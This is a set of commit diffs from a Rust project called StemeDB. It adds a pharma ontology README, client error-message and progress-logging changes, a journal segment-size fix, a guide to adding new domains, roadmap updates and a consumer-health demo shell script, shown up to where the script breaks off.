use stemedb_ontology::pharma::extractors::{FdaLabelExtractor, MedicalExtractor, SourceInput};
use ed25519_dalek::SigningKey;
use rand::rngs::OsRng;
// Load the pharma domain definition
let domain = pharma::definition();
// Build a subject using the ontology
let schema = domain.get_schema("efficacy").unwrap();
let mut entities = std::collections::HashMap::new();
entities.insert("Drug".to_string(), "Semaglutide".to_string());
entities.insert("Indication".to_string(), "Type2Diabetes".to_string());
let subject = SubjectBuilder::build(schema, &entities, &domain).unwrap();
assert_eq!(subject, "Semaglutide:Type2Diabetes");
// Validate assertions
let validator = Validator::new(&domain);
let result = validator.validate("hba1c_reduction_percent", &subject, 0.95);
assert!(result.is_ok());
// Extract and ingest claims
let client = StemeClient::new("http://localhost:18180");
let extractor = FdaLabelExtractor::new();
let signing_key = SigningKey::generate(&mut OsRng);
let agent_id = signing_key.verifying_key().to_bytes();
let hlc = uhlc::HLCBuilder::new().build();
let claims = extractor.extract(&SourceInput::DrugName("semaglutide".into())).await?;
for claim in claims {
let assertion = claim.to_assertion(&signing_key, agent_id, &hlc);
let hash = client.assert(&assertion).await?;
println!("Ingested: {}", hash);
}
// Query for conflicts
let skeptic = client.skeptic("Semaglutide:Type2Diabetes", "hba1c_reduction_percent").await?;
println!("Conflict score: {}", skeptic.conflict_score);
```
## Architecture
```
┌─────────────────────────────────────┐
│ Domain Definition │
│ (EntityTypes, Schemas, Hierarchy) │
└──────────────┬──────────────────────┘
┌───────────────────────┼───────────────────────┐
│ │ │
v v v
┌─────────────────┐ ┌──────────────────┐ ┌──────────────────┐
│ SubjectBuilder │ │ Validator │ │ MedicalExtractor│
│ │ │ │ │ (trait) │
│ Build canonical │ │ Validate against │ │ Extract claims │
│ subject strings │ │ domain rules │ │ from sources │
└────────┬────────┘ └────────┬─────────┘ └────────┬─────────┘
│ │ │
└──────────────┬──────┴──────────────────────┘
v
┌───────────────────┐
│ StemeClient │
│ │
│ Submit assertions │
│ Query with lenses │
└─────────┬─────────┘
v
┌───────────────────┐
│ StemeDB API │
│ :18180/v1/* │
└───────────────────┘
```
## Subject Patterns
Different predicate types use different subject structures to ensure proper collision:
| Category | Pattern | Example | Use Case |
|----------|---------|---------|----------|
| Efficacy | `{Drug}:{Indication}` | `Semaglutide:Type2Diabetes` | Outcome measures for specific conditions |
| Safety | `{Drug}` | `Semaglutide` | Adverse events (apply across indications) |
| Mechanism | `{Drug}:{Target}` | `Semaglutide:GLP1R` | Pharmacology details |
| Comparison | `{Drug}:{Comparator}:{Indication}` | `Semaglutide:Tirzepatide:Type2Diabetes` | Head-to-head trials |
## Source Hierarchy
Claims are weighted by source authority:
| Tier | Source Class | Weight | Examples |
|------|--------------|--------|----------|
| 0 | Regulatory | 1.0 | FDA Labels, EMA Reports |
| 1 | Clinical | 0.9 | Phase III RCTs, Lancet, NEJM |
| 2 | Observational | 0.7 | Real-World Evidence, FAERS |
| 3 | Expert | 0.5 | Guidelines, ADA Standards |
| 4 | Community | 0.3 | PatientsLikeMe, Moderated Forums |
| 5 | Anecdotal | 0.1 | Reddit, Twitter, Blog Posts |
## Adding a New Domain
See [Adding a Domain Guide](../../docs/guides/adding-a-domain.md) for step-by-step instructions on implementing new domains (e.g., cardiology, finance).
## Testing
```bash
# Run all ontology tests
cargo test -p stemedb-ontology
# Run with output
cargo test -p stemedb-ontology -- --nocapture
# Consumer Health UAT
cargo test -p stemedb-ontology --test consumer_health_uat
```
## Related Documentation
- [What is Episteme](../../what-is-episteme.md)
- [Architecture](../../architecture.md)
- [Vision](../../vision.md)
- [Consumer Health Use Case](../../docs/app-concepts/consumer-health.md)

View File

@ -40,21 +40,26 @@ pub async fn run_ingest(
// Extract and ingest FDA claims
if !args.mock_only {
let extractor = FdaLabelExtractor::new();
let drugs: Vec<&str> = args.drugs.split(',').map(str::trim).collect();
let total_drugs = drugs.len();
for drug in args.drugs.split(',') {
let drug = drug.trim();
println!("--- Ingesting {} (FDA) ---", drug);
for (drug_idx, drug) in drugs.iter().enumerate() {
println!("--- [{}/{}] Ingesting {} (FDA) ---", drug_idx + 1, total_drugs, drug);
match extractor.extract(&SourceInput::DrugName(drug.to_string())).await {
match extractor.extract(&SourceInput::DrugName((*drug).to_string())).await {
Ok(claims) => {
info!(drug = drug, claims_count = claims.len(), "Extracted FDA claims");
for claim in claims {
let claims_count = claims.len();
info!(drug = drug, claims_count = claims_count, "Extracted FDA claims");
for (claim_idx, claim) in claims.iter().enumerate() {
let assertion = claim.to_assertion(&signing_key, agent_id, &hlc);
match client.assert(&assertion).await {
Ok(hash) => {
total_ingested += 1;
println!(
" [Regulatory] {} = {} -> {}...",
" [{}/{}] [Regulatory] {} = {} -> {}...",
claim_idx + 1,
claims_count,
claim.predicate,
format_value(&claim.value),
&hash[..16]
@ -63,7 +68,13 @@ pub async fn run_ingest(
Err(e) => {
total_errors += 1;
warn!(error = %e, predicate = %claim.predicate, "Failed to ingest");
println!(" [ERROR] {} -> {}", claim.predicate, e);
println!(
" [{}/{}] [ERROR] {} -> {}",
claim_idx + 1,
claims_count,
claim.predicate,
e
);
}
}
}

View File

@ -105,7 +105,13 @@ impl StemeClient {
let response = self.http_client.post(&url).json(&request).send().await.map_err(|e| {
if e.is_connect() {
ClientError::ServerUnavailable { url: url.clone(), message: e.to_string() }
ClientError::ServerUnavailable {
url: url.clone(),
message: format!(
"Connection failed: {}. Ensure StemeDB is running: cargo run -p stemedb-api",
e
),
}
} else {
ClientError::Http(e)
}
@ -170,7 +176,13 @@ impl StemeClient {
let response = self.http_client.get(&url).send().await.map_err(|e| {
if e.is_connect() {
ClientError::ServerUnavailable { url: url.clone(), message: e.to_string() }
ClientError::ServerUnavailable {
url: url.clone(),
message: format!(
"Connection failed: {}. Ensure StemeDB is running: cargo run -p stemedb-api",
e
),
}
} else {
ClientError::Http(e)
}
@ -223,7 +235,13 @@ impl StemeClient {
let response = self.http_client.get(&url).send().await.map_err(|e| {
if e.is_connect() {
ClientError::ServerUnavailable { url: url.clone(), message: e.to_string() }
ClientError::ServerUnavailable {
url: url.clone(),
message: format!(
"Connection failed: {}. Ensure StemeDB is running: cargo run -p stemedb-api",
e
),
}
} else {
ClientError::Http(e)
}
@ -286,7 +304,13 @@ impl StemeClient {
let response = self.http_client.get(&url).send().await.map_err(|e| {
if e.is_connect() {
ClientError::ServerUnavailable { url: url.clone(), message: e.to_string() }
ClientError::ServerUnavailable {
url: url.clone(),
message: format!(
"Connection failed: {}. Ensure StemeDB is running: cargo run -p stemedb-api",
e
),
}
} else {
ClientError::Http(e)
}
@ -329,7 +353,13 @@ impl StemeClient {
let response = self.http_client.get(&url).send().await.map_err(|e| {
if e.is_connect() {
ClientError::ServerUnavailable { url: url.clone(), message: e.to_string() }
ClientError::ServerUnavailable {
url: url.clone(),
message: format!(
"Connection failed: {}. Ensure StemeDB is running: cargo run -p stemedb-api",
e
),
}
} else {
ClientError::Http(e)
}

View File

@ -92,6 +92,12 @@ impl Journal {
})?;
guard.write(&buf)?;
// Update the cached segment size to reflect the write.
// This ensures read() can use the cached size for bounds checking.
let new_file_size =
guard.file().metadata().map_err(|e| QuarantineError::io(guard.path(), e))?.len();
self.segment_mgr.update_current_segment_size(new_file_size);
let offset = self.current_offset;
self.current_offset += record.disk_size();

View File

@ -147,6 +147,17 @@ impl SegmentManager {
current_segment_size >= self.max_segment_size
}
/// Update the cached size of the current (latest) segment.
///
/// Call this after appending data to keep the cached size in sync with
/// the actual file size. This ensures that `read()` operations can use
/// the cached size for bounds checking without a disk stat call.
pub fn update_current_segment_size(&mut self, new_size: u64) {
if let Some(segment) = self.segments.last_mut() {
segment.size = new_size;
}
}
/// Create a new segment with the given base offset.
///
/// Writes a v2 FileHeader to the new file and adds it to the segment list.

View File

@ -0,0 +1,590 @@
# Adding a New Domain to stemedb-ontology
This guide walks you through implementing a new domain (vertical) in the stemedb-ontology crate. By the end, you'll have a working domain with entity types, predicate schemas, and optional extractors.
**Time:** ~30 minutes
**Prerequisites:** Rust knowledge, familiarity with StemeDB concepts
## Overview
A domain in stemedb-ontology defines:
1. **Entity Types** - The kinds of things in your domain (e.g., Drug, Company, Asset)
2. **Predicate Schemas** - How subjects are built for different predicate categories
3. **Source Hierarchy** - How to weight different source authorities
4. **Extractors (optional)** - Code that extracts claims from external sources
## Step 1: Plan Your Domain Model
Before writing code, answer these questions:
### What entities exist in your domain?
| Entity | Description | Example Values |
|--------|-------------|----------------|
| ? | ? | ? |
**Pharma example:**
| Entity | Description | Example Values |
|--------|-------------|----------------|
| Drug | Pharmaceutical compound | Semaglutide, Tirzepatide |
| Indication | Medical condition | Type2Diabetes, Obesity |
| Target | Molecular target | GLP1R, GIPR |
### What predicates will you track?
Group predicates by category (determines subject pattern):
| Category | Subject Pattern | Example Predicates |
|----------|-----------------|-------------------|
| ? | ? | ? |
**Pharma example:**
| Category | Subject Pattern | Example Predicates |
|----------|-----------------|-------------------|
| Efficacy | `{Drug}:{Indication}` | hba1c_reduction_percent, weight_loss_percent |
| Safety | `{Drug}` | nausea_rate, has_boxed_warning |
| Mechanism | `{Drug}:{Target}` | binding_affinity, mechanism_of_action |
### What sources will provide data?
Order from most to least authoritative:
| Tier | Source Class | Examples | Weight |
|------|--------------|----------|--------|
| 0 | Regulatory | ? | 1.0 |
| 1 | Clinical | ? | 0.9 |
| ... | ... | ... | ... |
## Step 2: Create Domain Module
Create the directory structure:
```
crates/stemedb-ontology/src/
{domain}/
mod.rs # Re-exports
definition.rs # Domain::new() builder
```
### Template: `{domain}/mod.rs`
```rust
//! {Domain} domain ontology.
//!
//! This module defines the {domain} vertical with:
//! - Entity types (...)
//! - Predicate schemas (...)
//! - Source hierarchy (...)
pub mod definition;
pub use definition::definition;
// Re-export domain-specific types if any
// pub use definition::{...};
```
### Template: `{domain}/definition.rs`
```rust
//! Compiled-in {domain} domain definition.
use crate::domain::{
DefaultLens, Domain, EntityType, NamingConvention, PredicateSchema, SourceTier,
};
use stemedb_core::types::SourceClass;
/// Build the {domain} domain definition.
pub fn definition() -> Domain {
let mut domain = Domain::new(
"{Domain}",
"Description of what this domain covers",
);
// -------------------------------------------------------------------------
// Entity Types
// -------------------------------------------------------------------------
// Primary entity (e.g., the main subject of claims)
domain = domain.with_entity_type(
"{PrimaryEntity}",
EntityType::required("Description")
.with_naming(NamingConvention::CamelCase)
// Add aliases for common variations
.with_alias("ALIAS", "Canonical"),
);
// Secondary entity (for compound subjects)
domain = domain.with_entity_type(
"{SecondaryEntity}",
EntityType::required("Description")
.with_naming(NamingConvention::CamelCase),
);
// -------------------------------------------------------------------------
// Predicate Schemas
// -------------------------------------------------------------------------
// Category 1: Primary predicates (single entity subject)
domain = domain.with_predicate_schema(
"category1",
PredicateSchema::new(
"Description of this predicate category",
"{PrimaryEntity}",
)
.with_predicates(vec![
"predicate_one",
"predicate_two",
])
.with_default_lens(DefaultLens::Recency),
);
// Category 2: Compound predicates (multi-entity subject)
domain = domain.with_predicate_schema(
"category2",
PredicateSchema::new(
"Description",
"{PrimaryEntity}:{SecondaryEntity}",
)
.with_predicates(vec![
"compound_predicate",
])
.with_default_lens(DefaultLens::LayeredConsensus),
);
// -------------------------------------------------------------------------
// Source Hierarchy
// -------------------------------------------------------------------------
domain = domain.with_source_hierarchy(vec![
SourceTier::new(SourceClass::Regulatory, "Tier 0: Official Sources")
.with_examples(vec!["Government agencies", "Standards bodies"])
.with_weight(1.0),
SourceTier::new(SourceClass::Clinical, "Tier 1: Primary Research")
.with_examples(vec!["Peer-reviewed journals", "Research institutions"])
.with_weight(0.9)
.with_decay(730), // 2 year half-life
SourceTier::new(SourceClass::Observational, "Tier 2: Secondary Analysis")
.with_examples(vec!["Industry reports", "Analyst research"])
.with_weight(0.7)
.with_decay(365),
SourceTier::new(SourceClass::Expert, "Tier 3: Expert Opinion")
.with_examples(vec!["Industry experts", "Consultants"])
.with_weight(0.5)
.with_decay(180),
SourceTier::new(SourceClass::Community, "Tier 4: Community")
.with_examples(vec!["Professional forums", "Curated discussions"])
.with_weight(0.3)
.with_decay(90),
SourceTier::new(SourceClass::Anecdotal, "Tier 5: Anecdotal")
.with_examples(vec!["Social media", "Blog posts"])
.with_weight(0.1)
.with_decay(30),
]);
domain
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_definition_builds() {
let domain = definition();
assert_eq!(domain.name, "{Domain}");
assert!(!domain.entity_types.is_empty());
assert!(!domain.predicate_schemas.is_empty());
assert!(!domain.source_hierarchy.is_empty());
}
#[test]
fn test_entity_normalization() {
let domain = definition();
let entity = domain.get_entity_type("{PrimaryEntity}").expect("entity exists");
// Test alias normalization
assert_eq!(entity.normalize("ALIAS"), "Canonical");
assert_eq!(entity.normalize("Canonical"), "Canonical");
}
#[test]
fn test_predicate_schema_lookup() {
let domain = definition();
// Direct lookup
let schema = domain.get_schema("category1").expect("schema exists");
assert_eq!(schema.subject_pattern, "{PrimaryEntity}");
// Lookup by predicate
let schema = domain.schema_for_predicate("predicate_one").expect("found");
assert!(schema.predicates.contains(&"predicate_one".to_string()));
}
}
```
## Step 3: Implement Extractors (Optional)
If your domain has external data sources, implement the `MedicalExtractor` trait.
### Directory Structure
```
crates/stemedb-ontology/src/
{domain}/
mod.rs
definition.rs
extractors/
mod.rs
{source}.rs
```
### Template: `{domain}/extractors/mod.rs`
```rust
//! Data extractors for {domain}.
mod {source};
pub use {source}::{Source}Extractor;
// Re-export common traits from parent
pub use crate::pharma::extractors::{
ExtractError, MedicalClaim, MedicalExtractor, RetryConfig, SourceInput,
};
```
### Template: `{domain}/extractors/{source}.rs`
```rust
//! {Source} data extractor.
use super::{ExtractError, MedicalClaim, MedicalExtractor, SourceInput};
use async_trait::async_trait;
use stemedb_core::types::{ObjectValue, SourceClass};
/// Extractor for {Source} data.
pub struct {Source}Extractor {
http_client: reqwest::Client,
base_url: String,
}
impl {Source}Extractor {
/// Create a new extractor.
pub fn new() -> Self {
Self {
http_client: reqwest::Client::new(),
base_url: "https://api.example.com".to_string(),
}
}
}
impl Default for {Source}Extractor {
fn default() -> Self {
Self::new()
}
}
#[async_trait]
impl MedicalExtractor for {Source}Extractor {
fn name(&self) -> &str {
"{Source} Extractor"
}
fn source_class(&self) -> SourceClass {
SourceClass::Regulatory // Adjust based on source authority
}
fn can_handle(&self, source: &SourceInput) -> bool {
matches!(source, SourceInput::DrugName(_) | SourceInput::Url(_))
}
async fn extract(&self, source: &SourceInput) -> Result<Vec<MedicalClaim>, ExtractError> {
let query = match source {
SourceInput::DrugName(name) => name.clone(),
SourceInput::Url(url) => url.clone(),
_ => return Err(ExtractError::NotFound("Unsupported input type".into())),
};
// Fetch data from source
let url = format!("{}/search?q={}", self.base_url, urlencoding::encode(&query));
let response = self.http_client.get(&url).send().await?;
if !response.status().is_success() {
return Err(ExtractError::ApiError(format!(
"HTTP {}", response.status()
)));
}
// Parse response and extract claims
let mut claims = Vec::new();
// Example claim
claims.push(
MedicalClaim::new(
"Subject",
"predicate_name",
ObjectValue::Float(42.0),
)
.with_confidence(0.9)
.with_source_url(&url)
.with_source_section("Section Name")
.with_quote("Supporting quote from source")
.with_source_class(self.source_class())
);
Ok(claims)
}
}
```
## Step 4: Create CLI Binary (Optional)
For user-facing domains, create a CLI tool.
### Template: `src/bin/steme_{domain}.rs`
```rust
//! CLI for {domain} domain operations.
use clap::Parser;
use stemedb_ontology::client::StemeClient;
use stemedb_ontology::{domain}::definition;
mod cli;
mod commands;
#[derive(Parser)]
#[command(name = "steme-{domain}")]
#[command(about = "{Domain} data operations for StemeDB")]
struct Cli {
#[arg(long, default_value = "http://localhost:18180")]
server: String,
#[command(subcommand)]
command: Commands,
}
#[derive(clap::Subcommand)]
enum Commands {
/// Ingest data
Ingest { /* args */ },
/// Query data
Query { /* args */ },
}
#[tokio::main]
async fn main() -> Result<(), Box<dyn std::error::Error>> {
let cli = Cli::parse();
let client = StemeClient::new(&cli.server);
match cli.command {
Commands::Ingest { /* args */ } => {
// Implementation
}
Commands::Query { /* args */ } => {
// Implementation
}
}
Ok(())
}
```
## Step 5: Testing Checklist
Before considering your domain complete:
- [ ] `cargo build -p stemedb-ontology` succeeds
- [ ] `definition()` returns a valid Domain
- [ ] All entity types have meaningful descriptions
- [ ] All predicate schemas have correct subject patterns
- [ ] Entity normalization works (aliases resolve correctly)
- [ ] `schema_for_predicate()` finds the right schema
- [ ] Source hierarchy has 6 tiers with decreasing weights
- [ ] (If extractors) `cargo test -p stemedb-ontology` passes
Run the tests:
```bash
cargo test -p stemedb-ontology
cargo clippy -p stemedb-ontology -- -D warnings
```
## Step 6: Integration
### Export from lib.rs
Edit `crates/stemedb-ontology/src/lib.rs`:
```rust
// Add your domain module
pub mod {domain};
// Re-export for convenience
pub use {domain}::definition as {domain}_domain;
```
### Update ai-lookup
Add entry to `ai-lookup/index.md` under Domain Ontology section.
### Update CLAUDE.md routing (if significant)
If your domain is frequently used, add a routing entry in the Find Your Guide table.
## Complete Example: Cardiology Domain (Skeleton)
Here's a minimal working example for a cardiology domain:
```rust
// crates/stemedb-ontology/src/cardiology/mod.rs
//! Cardiology domain ontology.
pub mod definition;
pub use definition::definition;
```
```rust
// crates/stemedb-ontology/src/cardiology/definition.rs
use crate::domain::{DefaultLens, Domain, EntityType, NamingConvention, PredicateSchema, SourceTier};
use stemedb_core::types::SourceClass;
pub fn definition() -> Domain {
let mut domain = Domain::new(
"Cardiology",
"Cardiovascular conditions, procedures, and outcomes",
);
// Entities
domain = domain
.with_entity_type(
"Condition",
EntityType::required("Cardiovascular condition")
.with_naming(NamingConvention::CamelCase)
.with_alias("MI", "MyocardialInfarction")
.with_alias("CHF", "CongestiveHeartFailure")
.with_alias("AF", "AtrialFibrillation"),
)
.with_entity_type(
"Procedure",
EntityType::required("Medical procedure")
.with_naming(NamingConvention::CamelCase)
.with_alias("CABG", "CoronaryArteryBypassGraft")
.with_alias("PCI", "PercutaneousCoronaryIntervention"),
)
.with_entity_type(
"Biomarker",
EntityType::required("Diagnostic biomarker")
.with_naming(NamingConvention::CamelCase),
);
// Schemas
domain = domain
.with_predicate_schema(
"diagnosis",
PredicateSchema::new("Diagnostic criteria", "{Condition}")
.with_predicates(vec![
"diagnostic_criteria",
"staging_system",
"severity_classification",
])
.with_default_lens(DefaultLens::Authority),
)
.with_predicate_schema(
"outcome",
PredicateSchema::new("Treatment outcomes", "{Condition}:{Procedure}")
.with_predicates(vec![
"mortality_rate",
"complication_rate",
"readmission_rate",
"length_of_stay_days",
])
.with_default_lens(DefaultLens::LayeredConsensus),
)
.with_predicate_schema(
"biomarker",
PredicateSchema::new("Biomarker thresholds", "{Biomarker}")
.with_predicates(vec![
"normal_range",
"diagnostic_threshold",
"prognostic_value",
])
.with_default_lens(DefaultLens::Consensus),
);
// Source hierarchy
domain = domain.with_source_hierarchy(vec![
SourceTier::new(SourceClass::Regulatory, "Tier 0: Guidelines")
.with_examples(vec!["ACC/AHA Guidelines", "ESC Guidelines"])
.with_weight(1.0),
SourceTier::new(SourceClass::Clinical, "Tier 1: Clinical Trials")
.with_examples(vec!["Landmark RCTs", "Meta-analyses"])
.with_weight(0.9)
.with_decay(730),
SourceTier::new(SourceClass::Observational, "Tier 2: Registries")
.with_examples(vec!["NCDR", "Get With The Guidelines"])
.with_weight(0.7)
.with_decay(365),
SourceTier::new(SourceClass::Expert, "Tier 3: Expert Consensus")
.with_examples(vec!["Consensus statements", "Textbooks"])
.with_weight(0.5)
.with_decay(180),
SourceTier::new(SourceClass::Community, "Tier 4: Community")
.with_examples(vec!["Medical forums", "CME discussions"])
.with_weight(0.3)
.with_decay(90),
SourceTier::new(SourceClass::Anecdotal, "Tier 5: Anecdotal")
.with_examples(vec!["Case reports", "Social media"])
.with_weight(0.1)
.with_decay(30),
]);
domain
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_cardiology_domain() {
let domain = definition();
assert_eq!(domain.name, "Cardiology");
// Check entity aliases
let condition = domain.get_entity_type("Condition").unwrap();
assert_eq!(condition.normalize("MI"), "MyocardialInfarction");
// Check schema lookup
let schema = domain.schema_for_predicate("mortality_rate").unwrap();
assert_eq!(schema.subject_pattern, "{Condition}:{Procedure}");
}
}
```
## Troubleshooting
### "Unknown predicate" errors
Your predicate isn't in any schema. Add it to the appropriate `with_predicates()` call.
### Subject collision issues
If claims that should conflict aren't conflicting, check that:
1. The subject pattern matches your intent
2. Entity values are being normalized consistently
3. The predicate is in the right schema category
### Extractor not finding data
1. Check the API URL is correct
2. Verify the query parameters match the API's expectations
3. Add debug logging to see raw responses
## Next Steps
- Run the Consumer Health UAT to see the pharma domain in action
- Read the [Lens documentation](../services/lens.md) to understand conflict resolution
- Check the [SDK guide](../../ai-lookup/services/sdk.md) for Go integration

View File

@ -44,7 +44,7 @@
| **Time Travel Works** | `as_of=2024-01-01` returns historical snapshot | ✅ Infrastructure ready |
| **Decay Works** | 6-month-old Reddit claim has lower effective confidence than fresh FDA | ✅ Infrastructure ready |
| **UAT Passes** | Consumer Health scenarios documented and verified | ✅ Week 4 |
| **Self-Serve Demo** | CLI tool lets anyone explore without code | 🚧 Week 5 |
| **Self-Serve Demo** | CLI tool lets anyone explore without code | Week 5 |
### The Demo Script
@ -76,7 +76,7 @@
| **Week 2** ✅ | FDA extractor, claim-to-assertion signing | Ontology | Week 1 |
| **Week 3** ✅ | Ingest FDA claims, mock conflicts, SkepticLens demo | Ontology | Week 2 |
| **Week 4** ✅ | UAT scenarios documented and verified | Ontology | Week 3 |
| **Week 5** | `steme-pharma` CLI for self-serve exploration | Ontology | Week 3 |
| **Week 5** | `steme-pharma` CLI for self-serve exploration | Ontology | Week 3 |
| **Week 6** | Polish, factor out reusable patterns, document | Ontology | Week 4-5 |
### What's NOT in MVP
@ -1346,11 +1346,10 @@ These are valuable but not required to prove the core value proposition:
* [x] **Week 2**: FDA Extractor + Signing — `FdaLabelExtractor`, `MedicalClaim::to_assertion()`, exponential backoff. ✅ COMPLETE
* [x] **Week 3**: StemeDB Integration — `StemeClient`, `pharma-ingest` CLI, mock conflict demo. ✅ COMPLETE
* [x] **Week 4**: UAT Scenarios — Document acceptance criteria, validation tests. ✅ COMPLETE
* [ ] **Week 5**: CLI Tool — `steme-pharma` CLI for ingest/query/compare.
* [x] **Week 5**: CLI Tool — `steme-pharma` CLI for ingest/query/compare. ✅ COMPLETE
* [ ] **Week 6**: Generalization — Factor out reusable patterns, document "Adding a Domain".
### Next Up
* **Week 5 MVP**: Full `steme-pharma` CLI with query, compare, and explore commands.
* **Week 6 MVP**: Factor out reusable patterns, document "Adding a Domain" guide.
* **Phase 8B-C** (deferred): Observability, geo-distribution — production concerns, not MVP blockers.
@ -1363,6 +1362,14 @@ These are valuable but not required to prove the core value proposition:
* **Agent Wallet** (Key management sidecar) -> App layer.
### Recently Completed
* [x] **🎯 MVP Week 5**: `steme-pharma` CLI for self-serve exploration.
* Full CLI binary with 5 subcommands: `ingest`, `query`, `compare`, `explore`, `validate`.
* Query modes: `skeptic` (default), `layered` (per-tier), and lens-based (recency, consensus, etc.).
* Table and JSON output formats via `comfy-table`.
* Client extensions: `layered()`, `query()`, `list_predicates()` methods.
* Response DTOs: `LayeredResponse`, `QueryResponse`, `AssertionDto`, `TierResolutionDto`.
* Domain validation for known pharma predicates and subject patterns.
* Modular design: cli.rs, commands.rs, helpers.rs, output.rs.
* [x] **🎯 MVP Week 4**: UAT scenarios documented and verified.
* Integration test suite: `crates/stemedb-ontology/tests/consumer_health_uat.rs`
* 4 automated UAT scenarios with real Ed25519 signing
@ -1597,7 +1604,10 @@ INFRASTRUCTURE (Complete) VERTICAL INTEGRATION (In Progress)
[stemedb-ontology Weeks 1-3] ✅ ───────────────────────┘
(Domain defs, FDA extractor, StemeClient) |
v
[MVP Week 5: CLI Tool] [ ]
[MVP Week 5: CLI Tool] ✅
|
v
[MVP Week 6: Polish & Docs] [ ]
|
v
🎯 CONSUMER HEALTH MVP

239
scripts/demo-consumer-health.sh Executable file
View File

@ -0,0 +1,239 @@
#!/usr/bin/env bash
# Consumer Health Demo Script
# Demonstrates StemeDB + stemedb-ontology for the Consumer Health use case
#
# Prerequisites:
# - StemeDB API running: cargo run -p stemedb-api
# - steme-pharma built: cargo build -p stemedb-ontology
#
# Usage:
# ./scripts/demo-consumer-health.sh
set -e
# Colors
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
BOLD='\033[1m'
NC='\033[0m' # No Color
# Configuration
STEMEDB_URL="${STEMEDB_URL:-http://localhost:18180}"
PHARMA_CLI="./target/release/steme-pharma"
PAUSE_SECONDS=2
# Helper functions
print_header() {
echo -e "\n${BOLD}${BLUE}════════════════════════════════════════════════════════════════${NC}"
echo -e "${BOLD}${BLUE} $1${NC}"
echo -e "${BOLD}${BLUE}════════════════════════════════════════════════════════════════${NC}\n"
}
print_step() {
echo -e "${CYAN}$1${NC}"
}
print_success() {
echo -e "${GREEN}$1${NC}"
}
print_warning() {
echo -e "${YELLOW}$1${NC}"
}
print_error() {
echo -e "${RED}$1${NC}"
}
wait_for_user() {
if [ -t 0 ]; then
echo -e "\n${YELLOW}Press Enter to continue...${NC}"
read -r
else
sleep $PAUSE_SECONDS
fi
}
# Check prerequisites
print_header "Consumer Health Demo - Prerequisites Check"
# Check if steme-pharma exists
if [ ! -f "$PHARMA_CLI" ]; then
print_warning "steme-pharma not found at $PHARMA_CLI"
print_step "Building steme-pharma..."
cargo build --release -p stemedb-ontology
fi
# Check if StemeDB is running
print_step "Checking StemeDB connection..."
if curl -s "${STEMEDB_URL}/v1/health" > /dev/null 2>&1; then
print_success "StemeDB is running at $STEMEDB_URL"
else
print_error "StemeDB not reachable at $STEMEDB_URL"
echo -e "\nStart StemeDB with:"
echo -e " ${CYAN}cargo run -p stemedb-api${NC}"
exit 1
fi
# ============================================================================
# STEP 1: Ingest FDA Data + Mock Conflicts
# ============================================================================
print_header "Step 1: Ingest FDA Data + Mock Conflicts"
print_step "Ingesting FDA label data for Semaglutide and Tirzepatide..."
print_step "Adding mock conflicts (simulating social media contradictions)..."
echo ""
$PHARMA_CLI --stemedb-url "$STEMEDB_URL" ingest "semaglutide,tirzepatide" --with-conflicts
print_success "Data ingested with mock conflicts"
wait_for_user
# ============================================================================
# STEP 2: Conflict Detection (Skeptic Lens)
# ============================================================================
print_header "Step 2: Conflict Detection (Skeptic Lens)"
echo -e "${BOLD}Question:${NC} What do different sources say about Semaglutide's nausea rate?"
echo -e "${BOLD}Lens:${NC} Skeptic (shows all claims, highlights disagreements)\n"
print_step "Querying nausea_rate with Skeptic lens..."
echo ""
$PHARMA_CLI --stemedb-url "$STEMEDB_URL" query "Semaglutide" "nausea_rate" --mode skeptic
echo -e "\n${YELLOW}Note:${NC} The conflict score indicates disagreement between sources."
echo -e "FDA (Regulatory tier) reports clinical trial data."
echo -e "Reddit (Anecdotal tier) reports user experiences."
wait_for_user
# ============================================================================
# STEP 3: Source Hierarchy (Layered Consensus)
# ============================================================================
print_header "Step 3: Source Hierarchy (Layered Consensus)"
echo -e "${BOLD}Question:${NC} What's the consensus on HbA1c reduction, broken down by source tier?"
echo -e "${BOLD}Lens:${NC} LayeredConsensus (shows per-tier agreement)\n"
print_step "Querying hba1c_reduction_percent with Layered Consensus..."
echo ""
$PHARMA_CLI --stemedb-url "$STEMEDB_URL" query "Semaglutide:Type2Diabetes" "hba1c_reduction_percent" --mode layered
echo -e "\n${YELLOW}Note:${NC} Each tier shows its own consensus."
echo -e "Higher tiers (Regulatory, Clinical) have more weight in final resolution."
wait_for_user
# ============================================================================
# STEP 4: Drug Comparison
# ============================================================================
print_header "Step 4: Drug Comparison"
echo -e "${BOLD}Question:${NC} How do Semaglutide and Tirzepatide compare on weight loss?"
echo -e "${BOLD}Method:${NC} Side-by-side query of both subjects\n"
print_step "Comparing weight_loss_percent..."
echo ""
$PHARMA_CLI --stemedb-url "$STEMEDB_URL" compare \
"Semaglutide:Type2Diabetes" \
"Tirzepatide:Type2Diabetes" \
--predicate "weight_loss_percent"
echo -e "\n${YELLOW}Note:${NC} Both drugs' claims are shown with conflict scores."
echo -e "A consumer can see both FDA data and community reports."
wait_for_user
# ============================================================================
# STEP 5: Explore Available Data
# ============================================================================
print_header "Step 5: Explore Available Data"
echo -e "${BOLD}Question:${NC} What predicates are available for Semaglutide?"
echo -e "${BOLD}Method:${NC} List all predicates with assertions for this subject\n"
print_step "Exploring Semaglutide predicates..."
echo ""
$PHARMA_CLI --stemedb-url "$STEMEDB_URL" explore "Semaglutide:Type2Diabetes"
echo ""
print_step "Exploring Semaglutide safety predicates..."
echo ""
$PHARMA_CLI --stemedb-url "$STEMEDB_URL" explore "Semaglutide"
echo -e "\n${YELLOW}Note:${NC} Efficacy predicates use Drug:Indication subjects."
echo -e "Safety predicates use Drug-only subjects (apply across indications)."
wait_for_user
# ============================================================================
# STEP 6: JSON Output (for Integration)
# ============================================================================
print_header "Step 6: JSON Output (for Integration)"
echo -e "${BOLD}Use Case:${NC} Programmatic access for AI agents or web apps"
echo -e "${BOLD}Format:${NC} JSON output for parsing\n"
print_step "Getting JSON response..."
echo ""
$PHARMA_CLI --stemedb-url "$STEMEDB_URL" --format json query "Semaglutide" "nausea_rate" | head -50
echo -e "\n... (truncated for demo)"
wait_for_user
# ============================================================================
# Summary
# ============================================================================
print_header "Demo Summary"
echo -e "${GREEN}${BOLD}What We Demonstrated:${NC}\n"
echo -e " 1. ${CYAN}Data Ingestion${NC}"
echo -e " - FDA label extraction (Regulatory tier)"
echo -e " - Mock social media conflicts (Anecdotal tier)"
echo ""
echo -e " 2. ${CYAN}Conflict Detection${NC}"
echo -e " - Skeptic lens shows ALL claims"
